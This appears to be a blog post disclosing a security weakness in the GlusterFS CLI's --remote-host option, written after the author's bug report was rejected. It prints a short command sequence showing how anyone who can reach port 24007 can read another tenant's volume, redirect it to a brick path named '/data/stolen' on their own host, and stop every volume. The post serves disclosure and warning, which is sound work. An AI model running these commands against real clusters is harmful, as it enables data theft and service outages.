One more reason that GlusterFS should not be used as a SaaS offering

Posted by Joe Julian 2 years, 11 months ago (comments)

I filed a bug back in July 2013 asserting that a "feature" in the gluster CLI was a potential security bug. I've recently had that bug rejected as "Not a bug" so here it is.

The CLI has an option, "--remote-host" that allows you to perform gluster CLI operations on remote hosts. This can easily be exploited:

# From host "myhost1.domain.dom", a SaaS client of
yum -y install glusterfs-server
systemctl start glusterd
gluster peer probe myhost1.domain.dom
gluster volume info someone_elses_volume
gluster volume replace-brick someone_elses_volume \ \
    myhost1.domain.dom:/data/stolen commit force
gluster volume list | xargs -n1 gluster volume stop

Since all that is required is access to port 24007, the same port that's needed to mount a volume, it can't be blocked and, therefore, will leave your cluster open to abuse.